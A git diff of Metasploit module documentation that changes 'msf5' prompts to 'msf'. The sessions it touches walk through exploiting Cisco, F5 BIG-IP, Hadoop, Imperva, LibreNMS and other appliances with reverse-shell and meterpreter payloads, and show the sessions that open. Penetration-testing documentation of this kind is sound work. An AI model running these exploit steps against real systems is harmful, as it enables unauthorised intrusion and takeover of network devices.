
@@ -85,18 +85,18 @@ connection to the HTTP stager. Exploiting a vulnerable RV320 router with publicly accessible HTTPS web interface on TCP port 443: ``` -msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1 -msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp -msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2 -msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443 -msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true -msf5 exploit(linux/http/cisco_rv32x_rce) > run +msf exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1 +msf exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp +msf exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2 +msf exploit(linux/http/cisco_rv32x_rce) > set RPORT 443 +msf exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true +msf exploit(linux/http/cisco_rv32x_rce) > run ``` Demo example output for the module: ``` -msf5 > use exploit/linux/http/cisco_rv32x_rce -msf5 exploit(linux/http/cisco_rv32x_rce) > show options +msf > use exploit/linux/http/cisco_rv32x_rce +msf exploit(linux/http/cisco_rv32x_rce) > show options Module options (exploit/linux/http/cisco_rv32x_rce): 
@@ -119,17 +119,17 @@ Exploit target: -- ---- 0 LINUX MIPS64 -msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1 +msf exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 -msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp +msf exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp payload => linux/mips64/meterpreter_reverse_tcp -msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2 +msf exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2 LHOST => 192.168.1.2 -msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443 +msf exploit(linux/http/cisco_rv32x_rce) > set RPORT 443 RPORT => 443 -msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true +msf exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true USE_SSL => true -msf5 exploit(linux/http/cisco_rv32x_rce) > run +msf exploit(linux/http/cisco_rv32x_rce) > run [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Using URL: http://0.0.0.0:8080/ diff --git a/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md b/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md index b9ac310375..e667790873 100644 --- a/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md +++ b/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md @@ -69,8 +69,8 @@ shouldn't need to change it. ### Cisco UCS Director 6.7.3.0 VMware distribution ``` -msf5 > use exploit/linux/http/cisco_ucs_cloupia_script_rce -msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > options +msf > use exploit/linux/http/cisco_ucs_cloupia_script_rce +msf exploit(linux/http/cisco_ucs_cloupia_script_rce) > options Module options (exploit/linux/http/cisco_ucs_cloupia_script_rce): 
@@ -105,11 +105,11 @@ Exploit target: 1 Linux Dropper -msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > set rhosts 172.16.249.158 +msf exploit(linux/http/cisco_ucs_cloupia_script_rce) > set rhosts 172.16.249.158 rhosts => 172.16.249.158 -msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > set lhost 172.16.249.1 +msf exploit(linux/http/cisco_ucs_cloupia_script_rce) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > run +msf exploit(linux/http/cisco_ucs_cloupia_script_rce) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/linux/http/cisco_ucs_rce.md b/documentation/modules/exploit/linux/http/cisco_ucs_rce.md index b3f0aaf34e..da8a1d0fec 100644 --- a/documentation/modules/exploit/linux/http/cisco_ucs_rce.md +++ b/documentation/modules/exploit/linux/http/cisco_ucs_rce.md @@ -21,12 +21,12 @@ was not tested with those products. Setup RHOST, LHOST, LPORT and run it! ``` -msf5 exploit(linux/ssh/cisco_ucs_scpuser) > use exploit/linux/http/cisco_ucs_rce -msf5 exploit(linux/http/cisco_ucs_rce) > set rhost 10.9.8.121 +msf exploit(linux/ssh/cisco_ucs_scpuser) > use exploit/linux/http/cisco_ucs_rce +msf exploit(linux/http/cisco_ucs_rce) > set rhost 10.9.8.121 rhost => 10.9.8.121 -msf5 exploit(linux/http/cisco_ucs_rce) > set lhost 10.9.8.1 +msf exploit(linux/http/cisco_ucs_rce) > set lhost 10.9.8.1 lhost => 10.9.8.1 -msf5 exploit(linux/http/cisco_ucs_rce) > run +msf exploit(linux/http/cisco_ucs_rce) > run [*] Started reverse TCP handler on 10.9.8.1:4444 [+] 10.9.8.121:443 - Successfully bypassed auth and got our admin JSESSIONID cookie! @@ -41,5 +41,5 @@ Abort session 2? [y/N] y "" [*] 10.9.8.121 - Command shell session 2 closed. Reason: User exit -msf5 exploit(linux/http/cisco_ucs_rce) > +msf exploit(linux/http/cisco_ucs_rce) > ``` 
diff --git a/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md b/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md index 323d8d7791..734a21cc36 100644 --- a/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md +++ b/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md @@ -63,14 +63,14 @@ If the secondary server isn't working with the primary, then the HealthMonitor s **Running the check** ``` -msf5 exploit(linux/http/cpi_tararchive_upload) > check +msf exploit(linux/http/cpi_tararchive_upload) > check [*] 192.168.0.23:8082 - The target service is running, but could not be validated. ``` **Exploiting the service** ``` -msf5 exploit(linux/http/cpi_tararchive_upload) > run +msf exploit(linux/http/cpi_tararchive_upload) > run [*] Started reverse TCP handler on 192.168.0.21:4444 [*] Uploading tar file (3072 bytes) diff --git a/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md b/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md index 27fc66ee65..72aec9a053 100644 --- a/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md +++ b/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md 
@@ -16,18 +16,18 @@ Vulnerable firmwares are 1.01 up to 1.03. ## Scenarios ``` -msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1 +msf > use exploit/linux/http/dlink_dsl2750b_exec_noauth +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0 +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0 LHOST => eth0 -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555 +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555 LPORT => 5555 -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > run -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > run [*] Started reverse TCP handler on 192.168.1.6:5555 [*] 192.168.1.1:80 Checking target version... diff --git a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md index 5f3ddaf253..460b4c8879 100644 --- a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md +++ b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md @@ -19,7 +19,7 @@ In addition you will probably want to set `LHOST` and `SRVHOST`. ## Payloads ``` -msf5 exploit(linux/http/dlink_dwl_2600_command_injection) > show payloads +msf exploit(linux/http/dlink_dwl_2600_command_injection) > show payloads Compatible Payloads =================== 
@@ -43,7 +43,7 @@ Compatible Payloads ## Scenarios ``` -msf5 exploit(linux/http/dlink_dwl_2600_command_injection) > exploit +msf exploit(linux/http/dlink_dwl_2600_command_injection) > exploit [*] Started reverse TCP handler on 192.168.0.101:4444 [*] 192.168.0.100:80 - Trying to login with admin / admin diff --git a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md index 9059bd13bb..aef6dfeee9 100644 --- a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md +++ b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md @@ -42,7 +42,7 @@ value is 1. 1. EyesOfNetwork version 5.1 ``` -msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options +msf exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce): @@ -76,7 +76,7 @@ Exploit target: 1 Linux (x64) -msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit +msf exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Target is EyesOfNetwork version 5.1. Attempting exploitation using CVE-2020-9465. @@ -93,7 +93,7 @@ msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit 2. EyesOfNetwork version 5.2 ``` -msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit +msf exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Target is EyesOfNetwork version 5.2. Attempting exploitation using CVE-2020-9465. 
@@ -110,7 +110,7 @@ msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit 3. EyesOfNetwork version 5.3 ``` -msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit +msf exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Target is EyesOfNetwork version 5.3 or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656. diff --git a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md index f2b8c12067..d2010c583d 100644 --- a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md +++ b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md @@ -52,9 +52,9 @@ Defaults to `/tmp`. ### F5 BIG-IP 14.1.2 in VMware Fusion ``` -msf5 > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902 +msf > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902 [*] Using configured payload linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options +msf exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902): @@ -87,11 +87,11 @@ Exploit target: 1 Linux Dropper -msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179 +msf exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179 rhosts => 172.16.249.179 -msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1 +msf exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run +msf exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) 
diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index 0ebb8d378d..8b41519f5d 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -64,18 +64,18 @@ The password of the username used to authenticate on the admin page. **Default: ## Scenarios ### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. ``` -msf5 > use exploit/linux/http/geutebruck_testaction_exec -msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping +msf > use exploit/linux/http/geutebruck_testaction_exec +msf exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping payload => cmd/unix/reverse_netcat_gaping -msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root +msf exploit(linux/http/geutebruck_testaction_exec) > set httpusername root httpusername => root -msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin +msf exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin httppassword => admin -msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 +msf exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 lhost => 192.168.14.1 -msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 +msf exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 rhosts => 192.168.14.58 -msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit +msf exploit(linux/http/geutebruck_testaction_exec) > exploit [*] Started reverse TCP handler on 192.168.14.1:4444 [*] 192.168.14.58:80 - Attempting to exploit... 
diff --git a/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md b/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md index 546470dca1..851219dc06 100644 --- a/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md +++ b/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md @@ -34,8 +34,8 @@ Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up ## Scenarios ``` -msf5 > use exploit/linux/http/hadoop_unauth_exec -msf5 exploit(linux/http/hadoop_unauth_exec) > show options +msf > use exploit/linux/http/hadoop_unauth_exec +msf exploit(linux/http/hadoop_unauth_exec) > show options Module options (exploit/linux/http/hadoop_unauth_exec): @@ -59,11 +59,11 @@ Exploit target: 0 Automatic -msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141 +msf exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141 rhost => 192.168.77.141 -msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(linux/http/hadoop_unauth_exec) > show options +msf exploit(linux/http/hadoop_unauth_exec) > show options Module options (exploit/linux/http/hadoop_unauth_exec): @@ -95,9 +95,9 @@ Exploit target: 0 Automatic -msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141 +msf exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141 lhost => 192.168.77.141 -msf5 exploit(linux/http/hadoop_unauth_exec) > exploit +msf exploit(linux/http/hadoop_unauth_exec) > exploit [*] Started reverse TCP handler on 192.168.77.141:4444 [*] Sending Command diff --git a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md index 50b273592b..4674329af2 100644 --- a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md 
+++ b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md @@ -41,16 +41,16 @@ Set this to the service password. Defaults to `skyline`. ## Usage ``` -msf5 > use exploit/linux/http/hp_van_sdn_cmd_inject -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set rhosts 192.168.56.102 +msf > use exploit/linux/http/hp_van_sdn_cmd_inject +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set rhosts 192.168.56.102 rhosts => 192.168.56.102 -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set target Linux Dropper +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set target Linux Dropper target => Linux Dropper -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set lhost 192.168.56.1 +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run +msf exploit(linux/http/hp_van_sdn_cmd_inject) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Authenticating with service token AuroraSdnToken37 @@ -73,9 +73,9 @@ BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > Background session 1? [y/N] -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set token "" +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set token "" token => -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run +msf exploit(linux/http/hp_van_sdn_cmd_inject) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Authenticating with creds sdn:skyline diff --git a/documentation/modules/exploit/linux/http/ibm_drm_rce.md b/documentation/modules/exploit/linux/http/ibm_drm_rce.md index 17a4d56720..2e3f57eb50 100644 --- a/documentation/modules/exploit/linux/http/ibm_drm_rce.md +++ b/documentation/modules/exploit/linux/http/ibm_drm_rce.md 
@@ -28,7 +28,7 @@ A successful exploit will look like this: ``` -msf5 exploit(linux/http/ibm_drm_unauth_rce) > run +msf exploit(linux/http/ibm_drm_unauth_rce) > run [*] Started reverse TCP handler on 10.9.8.1:4444 [+] 10.9.8.213:8443 - Successfully "stickied" our session ID JQElTQxh diff --git a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md index 604d84315f..173a578925 100644 --- a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md +++ b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md @@ -22,16 +22,16 @@ Imperva SecureSphere 13.0/13.1/13.2 Imperva Secure 13.0 Pre-FTL mode: ``` -msf5 > use exploit/linux/http/imperva_securesphere_exec -msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +msf > use exploit/linux/http/imperva_securesphere_exec +msf exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 RHOST => 192.168.146.201 -msf5 exploit(linux/http/imperva_securesphere_exec) > check +msf exploit(linux/http/imperva_securesphere_exec) > check [+] 192.168.146.201:443 The target is vulnerable. -msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 +msf exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 LHOST => 192.168.146.215 -msf5 exploit(linux/http/imperva_securesphere_exec) > show options +msf exploit(linux/http/imperva_securesphere_exec) > show options Module options (exploit/linux/http/imperva_securesphere_exec): 
@@ -67,7 +67,7 @@ Exploit target: 0 Imperva SecureSphere 13.0/13.1/13.2 -msf5 exploit(linux/http/imperva_securesphere_exec) > exploit +msf exploit(linux/http/imperva_securesphere_exec) > exploit [*] Started reverse TCP handler on 192.168.146.215:4444 [*] Sending payload linux/x64/meterpreter/reverse_tcp @@ -113,18 +113,18 @@ meterpreter > exit Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential): ``` -msf5 > use exploit/linux/http/imperva_securesphere_exec -msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +msf > use exploit/linux/http/imperva_securesphere_exec +msf exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 RHOST => 192.168.146.201 -msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS +msf exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS PASS => lshy5782%lsLS -msf5 exploit(linux/http/imperva_securesphere_exec) > check +msf exploit(linux/http/imperva_securesphere_exec) > check [+] 192.168.146.201:443 The target is vulnerable. -msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 +msf exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 LHOST => 192.168.146.215 -msf5 exploit(linux/http/imperva_securesphere_exec) > show options +msf exploit(linux/http/imperva_securesphere_exec) > show options Module options (exploit/linux/http/imperva_securesphere_exec): 
@@ -160,7 +160,7 @@ Exploit target: 0 Imperva SecureSphere 13.0/13.1/13.2 -msf5 exploit(linux/http/imperva_securesphere_exec) > exploit +msf exploit(linux/http/imperva_securesphere_exec) > exploit [*] Started reverse TCP handler on 192.168.146.215:4444 [*] Sending payload linux/x64/meterpreter/reverse_tcp diff --git a/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md b/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md index d45dff16fd..0786077a96 100644 --- a/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md +++ b/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md @@ -31,16 +31,16 @@ ### Tested on LibreNMS 1.46 on Ubuntu 18.04 ``` - msf5 > use exploit/linux/http/librenms_addhost_cmd_inject - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143 + msf > use exploit/linux/http/librenms_addhost_cmd_inject + msf exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143 rhosts => 192.168.37.143 - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah + msf exploit(linux/http/librenms_addhost_cmd_inject) > set username blah username => blah - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password + msf exploit(linux/http/librenms_addhost_cmd_inject) > set password password password => password - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1 + msf exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run + msf exploit(linux/http/librenms_addhost_cmd_inject) > run [*] Started reverse TCP double handler on 192.168.37.1:4444 [*] Successfully logged into LibreNMS diff --git a/documentation/modules/exploit/linux/http/librenms_collectd_cmd_inject.md b/documentation/modules/exploit/linux/http/librenms_collectd_cmd_inject.md index 31336893f7..f97070c1d3 100644 
--- a/documentation/modules/exploit/linux/http/librenms_collectd_cmd_inject.md +++ b/documentation/modules/exploit/linux/http/librenms_collectd_cmd_inject.md @@ -90,20 +90,20 @@ ### Tested on LibreNMS `v1.46` ``` - msf5 > use exploit/linux/http/librenms_collectd_cmd_inject - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set rhosts 192.168.37.133 + msf > use exploit/linux/http/librenms_collectd_cmd_inject + msf exploit(linux/http/librenms_collectd_cmd_inject) > set rhosts 192.168.37.133 rhosts => 192.168.37.133 - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set username blah + msf exploit(linux/http/librenms_collectd_cmd_inject) > set username blah username => blah - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set password password + msf exploit(linux/http/librenms_collectd_cmd_inject) > set password password password => password - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set payload cmd/unix/reverse + msf exploit(linux/http/librenms_collectd_cmd_inject) > set payload cmd/unix/reverse payload => cmd/unix/reverse - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set lhost 192.168.37.1 + msf exploit(linux/http/librenms_collectd_cmd_inject) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > check + msf exploit(linux/http/librenms_collectd_cmd_inject) > check [*] 192.168.37.133:80 - The target service is running, but could not be validated. - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > run + msf exploit(linux/http/librenms_collectd_cmd_inject) > run [*] Started reverse TCP double handler on 192.168.37.1:4444 [*] Successfully logged into LibreNMS. Storing credentials... diff --git a/documentation/modules/exploit/linux/http/linuxki_rce.md b/documentation/modules/exploit/linux/http/linuxki_rce.md index 01e7bd983b..fc8f5295e0 100644 --- a/documentation/modules/exploit/linux/http/linuxki_rce.md +++ b/documentation/modules/exploit/linux/http/linuxki_rce.md 
@@ -31,8 +31,8 @@ Override check result. ## Scenarios ### LinuxKI Toolset v6.01 on CentOS 7.8 ``` -msf5 > use exploit/linux/http/linuxki_rce -msf5 exploit(linux/http/linuxki_rce) > show targets +msf > use exploit/linux/http/linuxki_rce +msf exploit(linux/http/linuxki_rce) > show targets Exploit targets: @@ -44,11 +44,11 @@ Exploit targets: 3 Automatic (Linux Dropper) -msf5 exploit(linux/http/linuxki_rce) > set rhosts 192.168.1.43 +msf exploit(linux/http/linuxki_rce) > set rhosts 192.168.1.43 rhosts => 192.168.1.43 -msf5 exploit(linux/http/linuxki_rce) > set rport 32769 +msf exploit(linux/http/linuxki_rce) > set rport 32769 rport => 32769 -msf5 exploit(linux/http/linuxki_rce) > run +msf exploit(linux/http/linuxki_rce) > run [*] Started reverse TCP handler on 192.168.1.43:4444 [*] Executing Automatic (PHP In-Memory) target @@ -64,11 +64,11 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.1.43 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(linux/http/linuxki_rce) > set target 1 +msf exploit(linux/http/linuxki_rce) > set target 1 target => 1 -msf5 exploit(linux/http/linuxki_rce) > unset payload +msf exploit(linux/http/linuxki_rce) > unset payload Unsetting payload... -msf5 exploit(linux/http/linuxki_rce) > run +msf exploit(linux/http/linuxki_rce) > run [*] Started reverse TCP handler on 192.168.1.43:4444 [*] Executing Automatic (PHP Dropper) target 
@@ -85,11 +85,11 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.1.43 - Meterpreter session 2 closed. Reason: User exit -msf5 exploit(linux/http/linuxki_rce) > set target 2 +msf exploit(linux/http/linuxki_rce) > set target 2 target => 2 -msf5 exploit(linux/http/linuxki_rce) > set payload cmd/unix/reverse_bash +msf exploit(linux/http/linuxki_rce) > set payload cmd/unix/reverse_bash payload => cmd/unix/reverse_bash -msf5 exploit(linux/http/linuxki_rce) > run +msf exploit(linux/http/linuxki_rce) > run [*] Started reverse TCP handler on 192.168.1.43:4444 [*] Executing Automatic (Unix In-Memory) target @@ -100,11 +100,11 @@ uname -a Linux 36503ef4f463 4.19.76-linuxkit #1 SMP Fri Apr 3 15:53:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux exit [*] 192.168.1.43 - Command shell session 3 closed. -msf5 exploit(linux/http/linuxki_rce) > set target 3 +msf exploit(linux/http/linuxki_rce) > set target 3 target => 3 -msf5 exploit(linux/http/linuxki_rce) > unset payload +msf exploit(linux/http/linuxki_rce) > unset payload Unsetting payload... -msf5 exploit(linux/http/linuxki_rce) > run +msf exploit(linux/http/linuxki_rce) > run [*] Started reverse TCP handler on 192.168.1.43:4444 [*] Executing Automatic (Linux Dropper) target @@ -123,5 +123,5 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 172.17.0.2 - Meterpreter session 4 closed. Reason: User exit -msf5 exploit(linux/http/linuxki_rce) > +msf exploit(linux/http/linuxki_rce) > ``` diff --git a/documentation/modules/exploit/linux/http/mailcleaner_exec.md b/documentation/modules/exploit/linux/http/mailcleaner_exec.md index 7c7859521c..ea6311c9ae 100644 --- a/documentation/modules/exploit/linux/http/mailcleaner_exec.md +++ b/documentation/modules/exploit/linux/http/mailcleaner_exec.md 
@@ -25,16 +25,16 @@ A successful check of the exploit will look like this: ## Scenarios ``` -msf5 > use exploit/linux/http/mailcleaner_exec -msf5 exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 +msf > use exploit/linux/http/mailcleaner_exec +msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 RHOSTS => 12.0.0.100 -msf5 exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 +msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 -msf5 exploit(linux/http/mailcleaner_exec) > set USERNAME admin +msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin USERNAME => admin -msf5 exploit(linux/http/mailcleaner_exec) > set PASSWORD +msf exploit(linux/http/mailcleaner_exec) > set PASSWORD PASSWORD => qwe123 -msf5 exploit(linux/http/mailcleaner_exec) > run +msf exploit(linux/http/mailcleaner_exec) > run [*] Started reverse TCP handler on 12.0.0.1:4444 [*] Performing authentication... 
